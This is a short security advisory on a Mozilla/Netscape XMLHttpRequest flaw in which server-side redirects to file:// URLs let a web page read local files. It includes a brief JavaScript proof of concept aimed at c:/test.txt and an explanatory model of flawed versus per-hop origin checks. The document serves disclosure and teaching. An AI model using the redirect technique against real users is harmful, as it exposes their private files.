XMLHTTP is a component that is primarily used for retrieving XML documents from a web server.
On 15 Dec 2001 "Jelmer" published an advisory titled "MSIE6 can read local files", which demonstrated how Microsoft's XMLHTTP component allows reading of local files by blindly following server-side redirections (patched by MS02-008).
Vulnerable systems:
* Mozilla version 0.9.7
* Mozilla version 0.9.9
* Netscape version 6.1
* Netscape version 6.2.1
* Netscape version 6.2.2
Details:
It appears that Mozilla's version of XMLHTTP, the XMLHttpRequest object, is vulnerable to the exact same attack.
By directing the "open" method to a web page that redirects to a local/remote file, it is possible to fool Mozilla into thinking it is still in the allowed zone, therefore allowing us to read the file.
It is then possible to inspect the content by using the responseText property.
Exploit:
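This example attempts to read "c:/test.txt". "getFile.asp" internally redirects to "file://c:/test.txt":
// Synchronous GET to a page on the same server, which redirects to the local file
var oXML=new XMLHttpRequest();
oXML.open("GET","getFile.asp",false);
oXML.send(null);
// The body of the redirected response is exposed to the calling script
alert(oXML.responseText);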
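
The flaw described above comes down to where the origin check is applied. The following is an added example, not code from the advisory, Mozilla or Microsoft: it models a check made only on the URL passed to "open" beside one repeated on every redirect hop. All function names and the site.example URLs are hypothetical.

```javascript
// Added example: a model of the origin check, not Mozilla's or Microsoft's code.
// All function names and sample URLs below are hypothetical/constructed.

// Reduce a URL (resolved against `base` when relative) to its origin tuple.
function originOf(url, base) {
  const u = new URL(url, base);
  return { href: u.href, scheme: u.protocol, host: u.hostname, port: u.port };
}

function sameOrigin(a, b) {
  return a.scheme === b.scheme && a.host === b.host && a.port === b.port;
}

// Flawed policy: only the URL handed to open() is checked; redirects are
// followed afterwards without re-validation.
function allowedFirstHopOnly(pageUrl, chain) {
  return sameOrigin(originOf(pageUrl), originOf(chain[0], pageUrl));
}

// Hardened policy: every hop must be http(s) and same-origin with the page,
// otherwise the response is withheld from script.
function allowedEveryHop(pageUrl, chain) {
  const page = originOf(pageUrl);
  let base = pageUrl;
  for (const hop of chain) {
    let target;
    try {
      target = originOf(hop, base);
    } catch (e) {
      return false; // unparseable redirect target: deny
    }
    if (target.scheme !== "http:" && target.scheme !== "https:") return false;
    if (!sameOrigin(page, target)) return false;
    base = target.href; // later relative redirects resolve against this hop
  }
  return true;
}

// Constructed sample data mirroring the advisory's request.
const PAGE = "http://site.example/page.html";
const FILE_CHAIN = ["getFile.asp", "file://c:/test.txt"];
const SAME_SITE_CHAIN = ["getFile.asp", "/data/feed.xml"];

console.log("first-hop-only, file redirect:", allowedFirstHopOnly(PAGE, FILE_CHAIN));
console.log("every-hop, file redirect:     ", allowedEveryHop(PAGE, FILE_CHAIN));
console.log("every-hop, same-site redirect:", allowedEveryHop(PAGE, SAME_SITE_CHAIN));
```

The first-hop-only policy accepts the chain that ends in a file: URL, while the per-hop policy rejects it and still permits a redirect that stays on the same site.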